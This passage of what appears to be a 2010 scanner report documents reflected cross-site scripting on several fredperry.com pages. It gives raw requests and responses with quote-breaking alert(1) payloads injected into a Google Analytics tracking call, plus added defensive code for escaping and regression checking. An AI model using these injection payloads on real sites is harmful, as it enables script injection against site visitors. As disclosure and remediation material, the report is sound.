Set-Cookie: frontend=i5c8ei9du2c74tcqn89ncrql67; expires=Tue, 09-Nov-2010 17:19:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Terms &
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/terms/?e4969"-alert(1)-"37e10aae9f7=1");
//]]>
...[SNIP]...

1.10. http://www.fredperry.com/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3885"-alert(1)-"9526fa7e2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessoriesb3885"-alert(1)-"9526fa7e2c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k2rp2ik1110pdvlrndo6p1vf63; expires=Tue, 09-Nov-2010 17:05:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessoriesb3885"-alert(1)-"9526fa7e2c/");
//]]>
...[SNIP]...
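The findings in this report all share one sink: the request URI is concatenated into the double-quoted argument of pageTracker._trackPageview(), so a double quote in the path or in a query-parameter name terminates the string literal and whatever follows is parsed as JavaScript. The example below is added here and is not code from the Hoyt LLC report or from fredperry.com. It reproduces the vulnerable rendering pattern next to a hardened one that encodes the value for the JavaScript-string-in-HTML-script context (quotes, backslashes, angle brackets, ampersands and the U+2028/U+2029 line terminators), then evaluates both snippets in a sandbox with a stub tracker and a stub alert() so the difference is observable. The function names, the stub objects and the sample URI are constructed for the example; the canary has the same shape as the scanner payloads above.

```javascript
// Added example (not from the report): vulnerable vs. encoded rendering of a
// request URI inside a double-quoted JavaScript string literal.

// Encode a value for use inside a double-quoted JS string literal that lives
// in an inline <script> block. JSON.stringify handles quotes, backslashes and
// control characters; the extra replacements handle characters that are fine
// in JSON but not in an inline script: "<" and ">" (so "</script>" and "]]>"
// cannot appear), "&" (defensive for non-CDATA XHTML), and U+2028/U+2029,
// which pre-ES2019 engines treat as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// The vulnerable pattern seen in the responses above: the URI is spliced
// straight into the string literal.
function renderTrackingVulnerable(requestUri) {
  return 'pageTracker._trackPageview("' + requestUri + '");';
}

// The fixed pattern: same statement, value emitted as an encoded literal.
function renderTrackingFixed(requestUri) {
  return "pageTracker._trackPageview(" + jsStringLiteral(requestUri) + ");";
}

// Run a generated snippet with a stub tracker and a stub alert() so we can
// see what a browser would have done. Returns the value the tracker received
// and whether alert() fired.
function execute(snippet) {
  const state = { tracked: null, alertFired: false };
  const pageTracker = { _trackPageview: (p) => { state.tracked = p; } };
  const alert = () => { state.alertFired = true; return 1; };
  new Function("pageTracker", "alert", snippet)(pageTracker, alert);
  return state;
}

// Constructed input: a normal-looking URI carrying a scanner-style canary
// (prefix"-alert(1)-"suffix) as the name of a query parameter.
const PAYLOAD_URI = '/accessories/?b3885"-alert(1)-"9526fa7e2c=1';

// Evaluate both renderings of the same URI. With the vulnerable rendering the
// literal closes at the first injected quote, the remainder is parsed as
// "..." - alert(1) - "..." and alert() fires; with the fixed rendering the
// tracker receives the URI unchanged and nothing else executes.
function demo() {
  return {
    vuln: execute(renderTrackingVulnerable(PAYLOAD_URI)),
    fixed: execute(renderTrackingFixed(PAYLOAD_URI)),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The point of the encoder is that HTML entity encoding is the wrong tool for this sink: &quot; inside a script block is not a quote to the JavaScript parser, so the literal still breaks. In PHP, the platform advertised by the X-Powered-By header above, the equivalent is json_encode() with the JSON_HEX_TAG, JSON_HEX_AMP, JSON_HEX_QUOT and JSON_HEX_APOS flags; those flags only exist from PHP 5.3.0, so on the 5.2.14 build shown here a manual escape of the kind above is needed.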

1.11. http://www.fredperry.com/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87dec"-alert(1)-"ff296b429aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/?87dec"-alert(1)-"ff296b429aa=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hct66ard6uj5ogudkb7unb1on2; expires=Tue, 09-Nov-2010 17:04:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Accesso
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/?87dec"-alert(1)-"ff296b429aa=1");
//]]>
...[SNIP]...
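Each Issue detail above rests on one observation: the canary came back inside the _trackPageview("...") literal with its double quotes intact. The check below is added here as a regression test for that observation and is not code from the report or from the site. Given a saved response body and the canary that was sent, it walks the string literal the way a JavaScript parser would (backslash escapes the next character, an unescaped double quote ends the literal) and reports whether the canary terminated the literal early (the vulnerable case in findings 1.10 and 1.11 alike, whichever part of the URL carried it) or survived inside it as data (what a fixed server should produce). The two sample bodies are constructed for the example, with the tracker ID replaced by a placeholder; the function and constant names are assumptions.

```javascript
// Added example (not from the report): did the canary break out of the
// _trackPageview("...") string literal in a saved response body?

const CALL_PREFIX = '_trackPageview("';

function checkTrackPageviewReflection(body, canary) {
  const start = body.indexOf(CALL_PREFIX);
  if (start < 0) {
    return { callFound: false, breaksOut: false, canaryAsData: false, literal: null };
  }
  // Scan the literal as a JS parser would: a backslash escapes the next
  // character, the first unescaped double quote ends the literal.
  let i = start + CALL_PREFIX.length;
  let literal = "";
  while (i < body.length && body[i] !== '"') {
    if (body[i] === "\\" && i + 1 < body.length) {
      literal += body[i] + body[i + 1];
      i += 2;
    } else {
      literal += body[i];
      i += 1;
    }
  }
  // A safe rendering closes the literal and then the call: ...");
  // Anything else after the closing quote means attacker text is being
  // parsed as code.
  const closedProperly = body.slice(i, i + 2) === '")';
  // When the literal is well formed, let the engine decode its escapes so we
  // can confirm the canary is still present as plain string data.
  let value = null;
  if (closedProperly) {
    value = new Function('return "' + literal + '";')();
  }
  return {
    callFound: true,
    breaksOut: !closedProperly,
    canaryAsData: value !== null && value.includes(canary),
    literal,
  };
}

// Constructed sample bodies, trimmed to the relevant script block: one in the
// shape of the vulnerable responses in this report, one as a server that
// escapes for the JS string context would render it.
const CANARY = '87dec"-alert(1)-"ff296b429aa';

const VULNERABLE_BODY = [
  "<![CDATA[",
  'var pageTracker = _gat._getTracker("UA-00000000-0");',
  'pageTracker._trackPageview("/accessories/?' + CANARY + '=1");',
  "//]]>",
].join("\n");

const FIXED_BODY = [
  "<![CDATA[",
  'var pageTracker = _gat._getTracker("UA-00000000-0");',
  'pageTracker._trackPageview("/accessories/?87dec\\"-alert(1)-\\"ff296b429aa=1");',
  "//]]>",
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", checkTrackPageviewReflection(VULNERABLE_BODY, CANARY));
  console.log("fixed:     ", checkTrackPageviewReflection(FIXED_BODY, CANARY));
}
```

To use it against a live fix, request the path or query-name variant with a fresh random canary of the same shape, save the body, and expect breaksOut to be false and canaryAsData to be true; a body where the canary is simply stripped will show canaryAsData false, which tells you the input was filtered rather than encoded and deserves a second look with a different payload.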

1.12. http://www.fredperry.com/accessories/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaeba"-alert(1)-"564e77c9441 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessorieseaeba"-alert(1)-"564e77c9441/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=773q5gsdpnv68cnfegbhjdu6s6; expires=Tue, 09-Nov-2010 17:04:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessorieseaeba"-alert(1)-"564e77c9441/men/");
//]]>
...[SNIP]...

1.13. http://www.fredperry.com/accessories/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0c1"-alert(1)-"54c23c18eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/menca0c1"-alert(1)-"54c23c18eea/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q7rt87m86laigg4gl21ne3jr05; expires=Tue, 09-Nov-2010 17:05:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/menca0c1"-alert(1)-"54c23c18eea/");
//]]>
...[SNIP]...

1.14. http://www.fredperry.com/accessories/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 590b7"-alert(1)-"544c5a1307c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/men/?590b7"-alert(1)-"544c5a1307c=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8a661dttofbjdqts80oc7tuh30; expires=Tue, 09-Nov-2010 17:03:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's A
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/men/?590b7"-alert(1)-"544c5a1307c=1");
//]]>
...[SNIP]...

1.15. http://www.fredperry.com/accessories/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11fe7"-alert(1)-"0b8ff4d883b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories11fe7"-alert(1)-"0b8ff4d883b/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=41433rkoa4tsrfs0gjisr0kgh3; expires=Tue, 09-Nov-2010 17:04:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories11fe7"-alert(1)-"0b8ff4d883b/women/");
//]]>
...[SNIP]...

1.16. http://www.fredperry.com/accessories/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ebf0"-alert(1)-"bda42614438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/women5ebf0"-alert(1)-"bda42614438/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rl1ftnqr0ih5pd8j1k1v00h7j4; expires=Tue, 09-Nov-2010 17:04:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/women5ebf0"-alert(1)-"bda42614438/");
//]]>
...[SNIP]...

1.17. http://www.fredperry.com/accessories/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39ae"-alert(1)-"affbc874198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/women/?c39ae"-alert(1)-"affbc874198=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=msht6dmdh4f7qkdrokbg4p7sa4; expires=Tue, 09-Nov-2010 17:03:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/women/?c39ae"-alert(1)-"affbc874198=1");
//]]>
...[SNIP]...

1.18. http://www.fredperry.com/arcade/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b4aa"-alert(1)-"eed14cdfb13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /arcade9b4aa"-alert(1)-"eed14cdfb13/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=enh4qopt52d480f45ghi1eifu3; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/arcade9b4aa"-alert(1)-"eed14cdfb13/");
//]]>
...[SNIP]...

1.19. http://www.fredperry.com/arcade/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a634a"-alert(1)-"292ae239ba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /arcade/?a634a"-alert(1)-"292ae239ba4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l6hegaha8strl6ujrbvmu5cg23; expires=Tue, 09-Nov-2010 17:18:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Arcade
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/arcade/?a634a"-alert(1)-"292ae239ba4=1");
//]]>
...[SNIP]...

1.20. http://www.fredperry.com/bags/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e542"-alert(1)-"ab556611c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags1e542"-alert(1)-"ab556611c86/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6et872hljcv57tm45lk8ssvqp2; expires=Tue, 09-Nov-2010 17:21:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

